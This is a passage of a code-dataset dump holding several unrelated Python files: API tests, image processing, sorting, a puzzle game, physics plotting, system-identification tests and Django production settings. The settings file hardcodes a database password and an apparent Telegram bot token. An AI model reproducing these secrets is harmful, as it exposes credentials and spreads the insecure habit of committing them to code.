3/3.5.py","file_name":"3.5.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"595051412","text":"import pytest\nfrom pages.label import Label\nfrom utility.logger import *\n\n\n@pytest.fixture()\ndef label_obj():\n label_obj = Label()\n yield label_obj\n label_obj.del_all()\n\n\n@pytest.mark.POST\ndef test_create_label(label_obj):\n try:\n assert label_obj.create_label_on_board(correct_red_label) == SUCCESS\n except Exception as err:\n logger.error(err)\n raise err\n\n\n@pytest.mark.DELETE\ndef test_del_a_label_on_board(label_obj):\n try:\n assert label_obj.del_a_label_on_board() == SUCCESS\n except Exception as err:\n logger.error(err)\n raise err\n\n\n@pytest.mark.PUT\ndef test_update_color(label_obj):\n try:\n assert label_obj.update_label_color() == SUCCESS\n except Exception as err:\n logger.error(err)\n raise err\n\n\n@pytest.mark.GET\ndef test_get_label_info(label_obj):\n try:\n assert label_obj.get_label_info() == SUCCESS\n except Exception as err:\n logger.error(err)\n raise err\n","sub_path":"tests/test_label.py","file_name":"test_label.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"556929646","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Hash code 2018.\n\nRunner of the simulations. Submissions files will be put into the named dir.\n\"\"\"\nimport os\nfrom code.hashcode import Simulation\n\nCHALLENGES = ['harthiya','mansour','zayona', 'karada']\n\nfor challenge in CHALLENGES:\n print('##### Executing simulation %s #####' % challenge)\n input_filename = os.path.join('datas', '%s.csv' % challenge)\n simulation = Simulation(input_filename)\n simulation.launch_simulation()\n simulation.submit()\n","sub_path":"Hackathon/hashcode2018-master/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"138443267","text":"import cv2\nimport numpy as np\n\n\noriginal_image = cv2.imread(\"./public/saved_images/originalImage.jpg\")\n\ndef biggestContour(contours):\n biggest = np.array([])\n max_area = 0\n for i in contours:\n area = cv2.contourArea(i)\n if area > 50:\n peri = cv2.arcLength(i, True)\n approx = cv2.approxPolyDP(i, 0.02 * peri, True)\n if area > max_area and len(approx) == 4:\n biggest = approx\n max_area = area\n return biggest,max_area\n\n\ndef pre_process_image(img):\n imgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) # CONVERT IMAGE TO GRAY SCALE\n imgBlur = cv2.GaussianBlur(imgGray, (5, 5), 1) # ADD GAUSSIAN BLUR\n imgThreshold = cv2.adaptiveThreshold(imgBlur, 255, 1, 1, 11, 2) # APPLY ADAPTIVE THRESHOLD\n return imgThreshold\n\n\nthreshold_img = pre_process_image(original_image) \n\ncontours, hierarchy = cv2.findContours(threshold_img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) \nframe = None\n\nbiggest, maxArea = biggestContour(contours) # FIND THE BIGGEST CONTOUR\nif (biggest.size !=0): \n perimeter = cv2.arcLength(biggest,True)\n \n approx = cv2.approxPolyDP(biggest,0.02*perimeter,True)\n\n ax = approx.item(0)\n ay = approx.item(1)\n bx = approx.item(2)\n by = approx.item(3)\n cx = approx.item(4)\n cy = approx.item(5)\n dx = approx.item(6)\n dy = approx.item(7)\n\n w,h = 900,900\n \n \n pt1 = np.float32([[bx,by],[ax,ay],[cx,cy],[dx,dy]])\n pt2 = np.float32([[0,0],[w,0],[0,h],[w,h]])\n\n matrix = cv2.getPerspectiveTransform(pt1,pt2)\n img_perspective = cv2.warpPerspective(original_image,matrix,(w,h))\n\n frame = cv2.cvtColor(img_perspective,cv2.COLOR_BGR2GRAY)\n frame = cv2.rotate(frame,cv2.ROTATE_90_COUNTERCLOCKWISE)\n cv2.imwrite(\"./public/saved_images/frame_binary.jpg\",frame)\nelse:\n print(\"No frame detected\")\n exit(1)\n\n","sub_path":"extractFrame.py","file_name":"extractFrame.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"631294924","text":"from __future__ import print_function\nimport sys\nimport string\nfrom matrix import *\nimport numpy as np\nfrom eigen import *\nimport math\n\nif len(sys.argv)>1 : \n n = int(sys.argv[1])\n\nelse:\n n = 4\n\n\nprint(\"Testing cyclic eigenvalue decomposition\")\n\nA = matrix(n, n)\n\n\nfor ii in range(0, n):\n A[ii,ii] = np.random.random()\n for jj in range(ii, n):\n const = np.random.random()\n A[ii, jj] = const\n A[jj, ii] = const\n\n\n\nprint(\"Original matrix, A:\")\nmatrix.printing(A)\n\nD, V = jacobi_cycle(A, 1e-6)\n\n\nprint('V: ')\nmatrix.printing(V)\n\nprint(\"Diagonalized eigenvalue matrix, D:\")\nmatrix.printing(D)\nprint(\"Testing V^{T}AV = D:\")\nmatrix.printing(matrix_mult(trans(V), matrix_mult(A, V)))\n#\"\"\"\n#eigen_by_eigen(A, 1, 1e-6)\n#\"\"\"\n\n\n","sub_path":"problems/eigenvalues/main_cyclic.py","file_name":"main_cyclic.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"591548571","text":"from random import shuffle\n\ndef partition(a, start, end):\n pivot_guess = ( start + int((end - start)/2))\n initial_pivot_val = a[pivot_guess]\n sorted_upto = start\n a[pivot_guess], a[end] = a[end], a[pivot_guess]\n for i in xrange(start, end):\n if a[i] < initial_pivot_val:\n a[i], a[sorted_upto] = a[sorted_upto], a[i]\n sorted_upto += 1\n \n a[end], a[sorted_upto] = a[sorted_upto], a[end]\n return sorted_upto\n\ndef quick_sort(a, start, end):\n if start >= end:\n return\n p = partition(a, start, end)\n quick_sort(a, start, p-1)\n quick_sort(a, p+1, end)\n\n\nif __name__ == '__main__':\n \n a = range(1,100000)\n shuffle(a)\n quick_sort(a, 0, len(a)-1)\n assert(all([a[i] <= a[i+1] for i in xrange(len(a) - 1)]))\n","sub_path":"practice/quicksort_practice.py","file_name":"quicksort_practice.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"366481206","text":"class Student:\n def __init__(self,name,hometown,age,height,favorite_ice_cream):\n self.name=name\n self.hometown=hometown\n self.age=age\n self.height=height\n self.favorite_ice_cream=favorite_ice_cream\n\n def print_summary(self):\n print(self.name)\n print(self.hometown)\n print(self.age)\n print(self.height)\n print(self.favorite_ice_cream)\n\n def get_giraffe_gap(self):\n giraffe=500\n return(giraffe-self.height)\n \n \n \n##from student import student\n##my_student=student(\"may\",\"hifa\",\"15\",\"160\",\"vanilla cookies\")\n##my_student.get_giraffe_gap(\"160\")\n","sub_path":"student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"276153274","text":"#!/usr/bin/env python3\nimport atlas_mpl_style as atlas\nimport numpy as np\nimport numexpr as ne\nimport scipy.stats as stats\nimport scipy.interpolate as interp\nfrom statsmodels.nonparametric.kernel_regression import KernelReg\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import AutoMinorLocator\nfrom matplotlib.markers import CARETUP\nimport argparse\nimport pickle\nimport ROOT as r\nr.PyConfig.IgnoreCommandLineOptions = True\n\nfrom root_pandas import read_root # noqa\natlas.use_atlas_style()\n\n\nclass FitFunction:\n def __init__(self, x, y, yerr=None):\n reg = KernelReg([y], [x], var_type='c', reg_type='ll')\n vals = reg.fit(x)[0]\n self.spline = interp.UnivariateSpline(\n x, vals, w=np.isfinite(vals), ext='const')\n # calculate RMS and normalize to stop normalization drifting\n xs = np.linspace(np.min(x), np.max(x), 1000)\n ys = self.spline(xs)\n self.rms = np.sqrt(np.sum(ys**2) / 1000)\n\n def __repr__(self):\n return f'RMS: {self.rms:.4g}, Spline: {str(self.spline.get_coeffs())}'\n\n def fit(self, x):\n return self.spline(x) / self.rms\n\n\n# import root_numpy as rnp\n# import rootpy as rpy\n\nparser = argparse.ArgumentParser(\n description=\"Plot data and background (QCD and MC)\", prog='plot.py')\nparser.add_argument(\n '--no-kinematic-reweighting',\n dest='no_kinematic_reweighting',\n default=False,\n action='store_true'\n)\nparser.add_argument(\n '--mc',\n dest='mc',\n action='append',\n nargs=2,\n metavar=('MC_label', 'MC_file'),\n help='MC backgrounds')\nparser.add_argument(\n '--norm',\n dest='norm',\n action='store',\n type=float,\n default='0.084',\n help='QCD normalization')\n\nparser.add_argument(\n '-f',\n dest='f',\n action='store',\n type=float,\n default='0.22',\n help='n-jets factor')\nparser.add_argument(\n 'region',\n choices=['signal', 'control', 'sideband'],\n default='signal',\n help='HH mass region',\n action='store')\nparser.add_argument(\n 'var',\n choices=[\n 'm_hh', 'm_h1', 'pT_h1', 'eta_h1', 'm_h2', 'pT_h2', 'eta_h2', 'njets',\n 'pT_4', 'pT_2', 'eta_i', 'dRjj_1', 'dRjj_2'\n ],\n default='m_hh',\n help='Variable to plot',\n action='store')\nparser.add_argument(\n 'data', action='store', metavar='data_file', help='Data ROOT file')\nargs = parser.parse_args()\nf = args.f\nif args.region == 'signal':\n args.region = 'sig' # match tree name\n\nvar_labels = {\n 'm_hh': r'$m_{hh}$ [GeV]',\n 'm_h1': r'$m^{\\textsf{lead}}_{h}$ [GeV]',\n 'pT_h1': r'$p_T^{\\textsf{lead}}$ [GeV]',\n 'eta_h1': r'$\\eta^{\\textsf{lead}}$ [GeV]',\n 'm_h2': r'$m^{\\textsf{sublead}}_{h}$ [GeV]',\n 'pT_h2': r'$p_T^{\\textsf{sublead}}$ [GeV]',\n 'eta_h2': r'$\\eta^{\\textsf{sublead}}$ [GeV]',\n 'njets': r'$n_{\\textsf{jets}}$',\n 'pT_4': r'$p_{T}(h_4)$ [GeV]',\n 'pT_2': r'$p_{T}(h_2)$ [GeV]',\n 'eta_i': r'$\\left< \\left| \\eta_i \\right| \\right>$',\n 'dRjj_1': r'$\\Delta R(j_1, j_2)$',\n 'dRjj_2': r'$\\Delta R(j_3, j_4)$'\n}\n\n# Kinematic reweighting\nif args.no_kinematic_reweighting:\n def reweight(df):\n pass\nelse:\n with open(\"reweight.pickle\", mode='rb') as file:\n all_rwgt_funcs = pickle.load(file)\n\n def reweight(df):\n sf = np.ones(df.shape[0])\n for rwgt in all_rwgt_funcs:\n for k, v in rwgt.items():\n if k == 'rwgt_pT_4':\n sel = df[k].values < 80\n sf[sel] *= v.fit(df[sel][k].values)\n else:\n sf *= v.fit(df[k].values)\n df['kinematic_sf'] = sf\n# End of kinematic reweighting\n\n\ndef nJetsWeight(f, ntag, njets):\n to_pick = 4 - ntag\n pick_from = njets - ntag\n return 1 - stats.binom.cdf(to_pick - 1, n=pick_from, p=f)\n\n\ndef plot_hists(hists, bins, ax=None):\n cumulative = np.zeros_like(hists[0][1])\n cumulative_errs = np.zeros_like(hists[0][1], dtype=np.float64)\n x = np.stack((bins[:-1], bins[1:])).ravel(1)\n if ax is None:\n ax = plt.gca()\n for label, hist, sumw2 in hists:\n y_low = np.stack((cumulative, cumulative)).ravel(1)\n y_high = np.stack((hist, hist)).ravel(1)\n ax.plot(x, y_high, color='k', lw='0.5')\n ax.fill_between(x, y_high, y_low, label=label)\n # ax.bar(x=x, height=hist, width=width, bottom=cumulative, label=label)\n cumulative += hist\n cumulative_errs += sumw2\n cumulative_errs = np.sqrt(cumulative_errs)\n return cumulative, cumulative_errs\n\n\ndef weighted_chisquare(f_obs, f_exp, f_obs_err, f_exp_err):\n \"Calculate weighted chi-square using method in arxiv:physics/0605123\"\n # selection = np.logical_and(f_obs >= 10, f_exp >= 10)\n selection = True\n w1 = f_obs[selection]\n w2 = f_exp[selection]\n s1 = f_obs_err[selection] # noqa\n s2 = f_exp_err[selection] # noqa\n W1 = np.sum(w1) # noqa\n W2 = np.sum(w2) # noqa\n X2 = ne.evaluate(\n \"sum((W1*w2 - W2*w1)**2 / (W1**2 * s2**2 + W2**2 * s1**2))\")\n p = stats.chi2.sf(X2, np.size(w1) - 1)\n return (X2, p)\n\n\nif args.var in ['njets']:\n var = args.var\nelif args.var in [\n 'm_hh', 'm_h1', 'pT_h1', 'eta_h1', 'm_h2', 'pT_h2', 'eta_h2'\n]:\n var = f'event_{args.var}'\nelif args.var in ['pT_4', 'pT_2', 'eta_i', 'dRjj_1', 'dRjj_2']:\n var = f'rwgt_{args.var}'\n\ndata, bins = np.histogram(\n read_root(args.data, args.region).query('ntag==4')[var].values,\n bins=(np.arange(3.5, 10.0, step=1) if var == 'njets' else 30))\nbin_centers = (bins[1:] + bins[:-1]) / 2\n\nfig, ax, ratio_ax = atlas.ratio_axes()\n\nbkgs = []\nmc_2tag = np.zeros_like(data, dtype=np.float64)\nmc_2tag_sumw2 = np.zeros_like(data, dtype=np.float64)\nif args.mc is None:\n args.mc = []\nfor mc in args.mc:\n df_4tag = read_root(mc[1], args.region).query('ntag==4')\n hist_4tag, _ = np.histogram(\n df_4tag[var].values, bins=bins, weights=df_4tag['mc_sf'].values)\n hist_4tag_sumw2, _ = np.histogram(\n df_4tag[var].values, bins=bins, weights=(df_4tag['mc_sf'].values**2))\n df_2tag = read_root(mc[1], args.region).query('ntag==2')\n reweight(df_2tag)\n hist_2tag, _ = np.histogram(\n df_2tag[var].values,\n bins=bins,\n weights=(df_2tag['mc_sf'].values * nJetsWeight(\n f, 2, df_2tag['njets'].values) * args.norm\n * df_2tag['kinematic_sf'].values))\n hist_2tag_sumw2, _ = np.histogram(\n df_2tag[var].values,\n bins=bins,\n weights=(df_2tag['mc_sf'].values * nJetsWeight(\n f, 2, df_2tag['njets'].values) * args.norm\n * df_2tag['kinematic_sf'].values)**2)\n\n mc_2tag += hist_2tag\n mc_2tag_sumw2 += hist_2tag_sumw2\n bkgs.append((mc[0], hist_4tag, hist_4tag_sumw2))\n\nqcd_df = read_root(args.data, args.region).query('ntag==2')\nreweight(qcd_df)\nqcd, _ = np.histogram(\n qcd_df[var].values,\n bins=bins,\n weights=(nJetsWeight(f, 2, qcd_df['njets'].values)\n * args.norm * qcd_df['kinematic_sf'].values))\nqcd -= mc_2tag # Subtract off 2 tag MCs\nqcd_sumw2, _ = np.histogram(\n qcd_df[var].values,\n bins=bins,\n weights=(nJetsWeight(f, 2, qcd_df['njets'].values)\n * args.norm * qcd_df['kinematic_sf'].values)**2)\nqcd_sumw2 += mc_2tag_sumw2 # Errors add\n\nbkg, bkg_err = plot_hists(bkgs + [('QCD', qcd, qcd_sumw2)], bins, ax=ax)\n# bkg_err = np.sqrt((0.1*bkg)**2 + bkg_err**2)\nax.errorbar(bin_centers, data, yerr=np.sqrt(data), fmt='ko', label='Data 16')\nx2, p = weighted_chisquare(data, bkg, np.sqrt(data), bkg_err)\nbkg_yield = np.sum(bkg)\ndata_yield = np.sum(data)\n\nhandles, labels = ax.get_legend_handles_labels()\nax.legend(reversed(handles), reversed(labels), loc='upper right')\n\nbkg_err /= bkg # proportional errors\nbkg_err = np.stack((bkg_err, bkg_err)).ravel(1) # double up\n\nratio_ax.plot([bins[0], bins[-1]], [0, 0], color='black')\nratio_ax.fill_between(\n np.stack((bins[:-1], bins[1:])).ravel(1),\n bkg_err,\n -bkg_err,\n color='black',\n alpha=0.3)\nratio = (data - bkg) / bkg\nratio_ax.errorbar(\n bin_centers, ratio, yerr=(np.sqrt(data) * (ratio / data)), fmt='ko')\nout_of_range = np.where(ratio > 1, 1, np.where(ratio < -1, -1, np.NaN))\nratio_ax.plot(bin_centers, out_of_range, marker=CARETUP, color='paper:red')\nratio_ax.set_ylabel(\n r\"$\\frac{\\textsf{Data} - \\textsf{Bkg}}{\\textsf{Bkg}}$\", fontsize=12)\nratio_ax.set_ylim((-1, 1))\nratio_ax.yaxis.set_minor_locator(AutoMinorLocator())\nax.yaxis.set_minor_locator(AutoMinorLocator())\natlas.set_xlabel(var_labels[args.var], ax=ratio_ax)\nax.set_ylim((0, ax.get_ylim()[1]))\natlas.set_ylabel('Events', ax=ax)\n\nregion = args.region\nif region == 'sig':\n region = 'signal'\nregion = region.capitalize()\n\natlas.draw_atlas_label(\n 0.3,\n 0.97,\n ax=ax,\n status='int',\n energy='13 TeV',\n lumi=24,\n desc=(fr'{region} Region \\\\ $\\chi^2={x2:.3f},\\ p={p:.3f}$ \\\\'\n fr'Bkg. Yield = {bkg_yield:.2f}, \\\\'\n fr'Data Yield = {data_yield:.5g}'),\n lumi_lt=True)\nfig.savefig(f'{args.var}-{region}-f{f}.pdf', transparent=True)\n","sub_path":"analysis/boosted/tools/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":8967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"62989820","text":"# coding: utf-8\n\nfrom __future__ import (\n unicode_literals, print_function, absolute_import, division\n)\n\nimport os\n\nDEBUG = False\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nHOME_DIR = os.path.dirname(BASE_DIR)\nLOGS_DIR = os.path.join(HOME_DIR, \"logs\")\nSTATIC_ROOT = os.path.join(HOME_DIR, \"static\")\nMEDIA_ROOT = os.path.join(HOME_DIR, \"media\")\n\nALLOWED_HOSTS = [\n \"karma.grumbler.me\"\n]\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql',\n 'HOST': '127.0.0.1',\n 'USER': 'karma',\n 'PASSWORD': \"*&Gasdf8gb&*Gxhabd\",\n 'NAME': 'karma',\n }\n}\n\nBOT_TOKEN = \"199502282:AAFVQvi5jRGfjxMqHND6lVFCji4qvA53yPQ\"\n\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'\n },\n 'simple': {\n 'format': '%(levelname)s %(message)s'\n },\n },\n 'handlers': {\n 'console': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'verbose',\n },\n 'file': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'filename': os.path.join(LOGS_DIR, \"app.log\"),\n },\n },\n 'loggers': {\n 'root': {\n 'handlers': ['console', 'file'],\n 'level': os.getenv('DJANGO_LOG_LEVEL', 'INFO'),\n },\n 'bot': {\n 'handlers': ['console', 'file'],\n 'level': os.getenv('DJANGO_LOG_LEVEL', 'INFO'),\n },\n 'karma': {\n 'handlers': ['console', 'file'],\n 'level': os.getenv('DJANGO_LOG_LEVEL', 'INFO'),\n },\n 'django': {\n 'handlers': ['console', 'file'],\n 'level': os.getenv('DJANGO_LOG_LEVEL', 'INFO'),\n },\n },\n}\n","sub_path":"karma/settings_prod.py","file_name":"settings_prod.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"224352532","text":"import random\n\nSIZE = 8\n\ndef main():\n \n def setTable( table ):\n options = []\n values = {}\n amount = SIZE - 3\n \n for i in range( amount ):\n options.append( i + 1 )\n for key in range( amount ):\n values[ key + 1 ] = 0\n for x in range( SIZE ):\n for y in range( SIZE ):\n if x == 0 or y == 0 or x == SIZE - 1 or y == SIZE - 1:\n table[ x ][ y ] = \" \"\n elif x == 1 and y == 1:\n table[ x ][ y ] = \"+\"\n elif x == 1:\n table[ x ][ y ] = \"-\"\n elif y == 1:\n table[ x ][ y ] = \"|\"\n else:\n selected = random.randint( 0, amount - 1 )\n while values[ options[ selected ] ] >= amount:\n selected = random.randint( 0, amount - 1 )\n values[ options [ selected ] ] += 1\n table[ x ][ y ] = str( options[ selected ] )\n for x in range( SIZE ):\n if x - 1 > 0:\n table[ 0 ][ x ] = str( x - 1 )\n table[ x ][ 0 ] = str( x - 1 )\n table[ 0 ][ SIZE - 1 ] = \"TOTAL\"\n table[ 1 ][ SIZE - 1 ] = \"-\"\n table[ SIZE - 1 ][ 0 ] = \"TOTAL\"\n table[ SIZE - 1 ][ 1 ] = \"|\"\n \n def displayTable( table ):\n calculateTotals( table )\n for x in range( SIZE ):\n for y in range( SIZE ):\n print( table[ x ][ y ], end = '\\t' )\n print()\n print()\n def swapNumbers( table ):\n amount = SIZE - 3\n \n firstRow = int( input( \"The row of the first number: \" ) )\n while firstRow < 1 or firstRow > amount:\n firstRow = int( input( \"The row of the first number: \" ) )\n firstColumn = int( input( \"The column of the first number: \" ) )\n while firstColumn < 1 or firstColumn > amount:\n firstColumn = int( input( \"The column of the first number: \" ) )\n secondRow = int( input( \"The row of the second number: \" ) )\n while secondRow < 1 or secondRow > amount:\n secondRow = int( input( \"The row of the second number: \" ) )\n secondColumn = int( input( \"The column of the second number: \" ) )\n while secondColumn < 0 or secondColumn > amount:\n secondColumn = int( input( \"The column of the second number: \" ) )\n temp = table[ secondRow + 1 ][ secondColumn + 1 ]\n table[ secondRow + 1 ][ secondColumn + 1 ] = table[ firstRow + 1 ][ firstColumn + 1 ]\n table[ firstRow + 1 ][ firstColumn + 1 ] = temp\n\n def calculateTotals( table ):\n for x in range( 2, SIZE ):\n table[ x ][ SIZE - 1 ] = 0\n table[ SIZE - 1 ][ x ] = 0\n for x in range( 2, SIZE ):\n totalRow = 0\n totalColumn = 0\n for y in range( 2, SIZE ):\n totalRow += int( table[ x ][ y ] )\n totalColumn += int( table[ y ][ x ] )\n table[ x ][ SIZE - 1 ] = totalRow\n table[ SIZE - 1 ][ x ] = totalColumn\n\n def isFinished( table ):\n amount = table[ 2 ][ SIZE - 1 ]\n \n for x in range( 2, SIZE - 1 ):\n if table[ x ][ SIZE - 1 ] != amount or table[ SIZE - 1 ][ x ] != amount:\n return False\n return True\n \n table = [ [ 0 for x in range( SIZE ) ] for y in range( SIZE ) ]\n turns = 0\n setTable( table )\n displayTable( table )\n while not isFinished( table ):\n swapNumbers( table )\n displayTable( table )\n turns += 1\n print(\"Thanks for playing took you \" + str( turns ) + \" turns to finish\")\nmain()\n","sub_path":"Numbers.py","file_name":"Numbers.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"105217012","text":"from random import randint\n\ndef sortear_dado():\n return randint(1,60)\n\ndef gera_cartao():\n resultado=[]\n final=0\n for i in range(1, 2146): \n numero = sortear_dado()\n if numero not in resultado:\n resultado.append(numero)\n final+=1\n if final == 6:\n print(sorted(resultado))\n break\n\ngera_cartao()","sub_path":"fundamentos/mega_sena_2145.py","file_name":"mega_sena_2145.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"315540436","text":"\"\"\"\nUnit testing.\n\"\"\"\nimport unittest\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nimport sysid\nimport time\nimport sysid.subspace\n\n# pylint: disable=invalid-name, no-self-use\n\nENABLE_PLOTTING = False\n\n\nclass TestSubspace(unittest.TestCase):\n \"\"\"\n Unit testing.\n \"\"\"\n\n def test_block_hankel(self):\n \"\"\"\n Block hankel function.\n \"\"\"\n y = np.random.rand(3, 100)\n Y = sysid.subspace.block_hankel(y, 5)\n self.assertEqual(Y.shape, (15, 95))\n\n def test_block_hankel_long(self):\n \"\"\"\n Block hankel function.\n \"\"\"\n y = np.random.rand(200, 3000)\n Y = sysid.subspace.block_hankel(y, 5)\n self.assertEqual(Y.shape, (1000, 2995))\n\n def test_project(self):\n A = np.array([[1, 2, 3], [3, 2, 1], [7, 8, 9]])\n print(A)\n Y = sysid.subspace.project(A)\n print(Y)\n # self.assertEqual(Y, np.array([[1.78125, 1.4375, 1.09375], [0.875, 1., 1.125], [-0.28125, 0.0625, 0.40625]]))\n\n\n def test_project_perp(self):\n A = np.array([[1, 2, 3], [3, 2, 1], [7, 8, 9]])\n print(A)\n Y = sysid.subspace.project_perp(A)\n print(Y)\n # [[-0.78125 - 1.4375 - 1.09375]\n # [-0.875 0. - 1.125]\n # [0.28125 - 0.0625 0.59375]]\n\n def test_project_oblique(self):\n A = np.array([[1, 2, 3], [3, 2, 1], [7, 8, 9]])\n print(A)\n B = np.array([[3, 2, 3], [3, 2, 2], [7, 8, 7]])\n print(B)\n Y = sysid.subspace.project_oblique(A, B)\n print(Y)\n # [[ 1.00000000e+00 8.88178420e-16 2.22044605e-15]\n # [ 1.22124533e-15 1.00000000e+00 1.22124533e-15]\n # [ 5.37764278e-16 -9.71445147e-16 1.00000000e+00]]\n\n def test_svd(self):\n \"\"\"\n Block hankel function.\n \"\"\"\n y = np.random.rand(100, 0)\n\n def test_subspace_simulate(self):\n # ss1 = sysid.ss.StateSpaceDiscreteLinear(\n # A=0.9, B=0.5, C=1, D=0, Q=0.01, R=0.01, dt=0.1)\n ss1 = sysid.StateSpaceDiscreteLinear(\n A=np.array([[0.9]]),\n B=np.array([[0.5]]),\n C=np.array([[1]]),\n D=np.array([[0]]),\n Q=np.diag([0.01]), R=np.diag([0.01]), dt=0.1)\n\n np.random.seed(1234)\n # prbs1 = np.array(np.matrix(sysid.subspace.prbs(1000)))\n prbs1 = sysid.subspace.prbs(1000)\n def f_prbs(t, x, i):\n return prbs1[i]\n tf = 10\n data = ss1.simulate(f_u=f_prbs,\n # x0=np.array(0),\n x0=np.array([[0]]).T,\n tf=tf)\n\n def test_subspace_det_algo1_siso(self):\n \"\"\"\n Subspace deterministic algorithm (SISO).\n \"\"\"\n ss1 = sysid.StateSpaceDiscreteLinear(\n A=0.9, B=0.5, C=1, D=0, Q=0.01, R=0.01, dt=0.1)\n\n np.random.seed(1234)\n prbs1 = sysid.prbs(1000)\n\n def f_prbs(t, x, i):\n \"input function\"\n # pylint: disable=unused-argument, unused-variable\n return prbs1[i]\n\n tf = 10\n data = ss1.simulate(f_u=f_prbs, x0=np.matrix(0), tf=tf)\n ss1_id = sysid.subspace_det_algo1(\n y=data.y, u=data.u,\n f=5, p=5, s_tol=1e-1, dt=ss1.dt)\n data_id = ss1_id.simulate(f_u=f_prbs, x0=0, tf=tf)\n nrms = sysid.subspace.nrms(data_id.y, data.y)\n self.assertGreater(nrms, 0.9)\n\n if ENABLE_PLOTTING:\n plt.plot(data_id.t.T, data_id.x.T, label='id')\n plt.plot(data.t.T, data.x.T, label='true')\n plt.legend()\n plt.grid()\n\n\n def test_subspace_det_algo1_mimo(self):\n \"\"\"\n Subspace deterministic algorithm (MIMO).\n \"\"\"\n ss2 = sysid.StateSpaceDiscreteLinear(\n A=np.array([[0, 0.1, 0.2],\n [0.2, 0.3, 0.4],\n [0.4, 0.3, 0.2]]),\n B=np.array([[1, 0],\n [0, 1],\n [0, -1]]),\n C=np.array([[1, 0, 0],\n [0, 1, 0]]),\n D=np.array([[0, 0],\n [0, 0]]),\n Q=np.diag([0.01, 0.01, 0.01]), R=np.diag([0.01, 0.01]), dt=0.1)\n np.random.seed(1234)\n prbs1 = sysid.prbs(1000)\n prbs2 = sysid.prbs(1000)\n\n def f_prbs_2d(t, x, i):\n \"input function\"\n #pylint: disable=unused-argument\n i = i % 1000\n return 2 * np.array([[prbs1[i]-0.5], [prbs2[i]-0.5]])\n tf = 8\n data = ss2.simulate(\n f_u=f_prbs_2d,\n x0 =np.array([[0, 0, 0]]).T,\n tf=tf)\n ss2_id = sysid.subspace_det_algo1(\n y=data.y, u=data.u,\n f=5, p=5, s_tol=0.1, dt=ss2.dt)\n data_id = ss2_id.simulate(\n f_u=f_prbs_2d,\n # x0=np.array(np.matrix(np.zeros(ss2_id.A.shape[0])).T),\n x0=np.array([np.zeros(ss2_id.A.shape[0])]).T,\n tf=tf)\n\n nrms = sysid.nrms(data_id.y, data.y)\n self.assertGreater(nrms, 0.9)\n\n if ENABLE_PLOTTING:\n for i in range(2):\n plt.figure()\n plt.plot(data_id.t.T, data_id.y[i, :].T,\n label='$y_{:d}$ true'.format(i))\n plt.plot(data.t.T, data.y[i, :].T,\n label='$y_{:d}$ id'.format(i))\n plt.legend()\n plt.grid()\n\n def test_subspace_det_algo1_mimo2(self):\n tf = 36 * 8\n dt = 1\n in_size = 5\n out_size = 2\n data_u = np.random.randn(in_size, tf)\n data_y = np.random.randn(out_size, tf)\n print(\"data_u.shape: {}, data_y.shape: {}\".format(data_u.shape, data_y.shape))\n print(\"MIMO [{} IN, {} OUT], {} time-steps.\".format(data_u.shape[0], data_y.shape[0], data_u.shape[1]))\n\n def f_prbs_4d(t, x, i):\n return np.array([data_u[:, i]]).T\n\n start_time = time.time() # Serial\n ss3_id = sysid.subspace_det_algo1(y=data_y, u=data_u,\n f=5, # 5 Forward steps\n p=5, # 5 Backward steps\n s_tol=0.01, # 0.2\n dt=dt,\n order=-1)\n print(\"--- Serial:\\t\\t{} seconds\".format(time.time() - start_time))\n data3_id = ss3_id.simulate(\n f_u=f_prbs_4d,\n x0=np.array([np.zeros(ss3_id.A.shape[0])]).T,\n tf=tf)\n print('fit {:f}%'.format(100 * sysid.subspace.nrms(data3_id.y, data_y[:, -1:])))\n\n\n def test_subspace_det_algo1_mimo3(self):\n tf = 365 * 8\n dt = 1\n in_size = 50\n out_size = 5\n data_u = np.random.randn(in_size, tf)\n data_y = np.random.randn(out_size, tf)\n print(\"data_u.shape: {}, data_y.shape: {}\".format(data_u.shape, data_y.shape))\n print(\"MIMO [{} IN, {} OUT], {} time-steps.\".format(data_u.shape[0], data_y.shape[0], data_u.shape[1]))\n\n def f_prbs_4d(t, x, i):\n return np.array([data_u[:, i]]).T\n\n start_time = time.time() # Serial\n ss3_id = sysid.subspace_det_algo1(y=data_y, u=data_u,\n f=5, # 5 Forward steps\n p=5, # 5 Backward steps\n s_tol=0.01, # 0.2\n 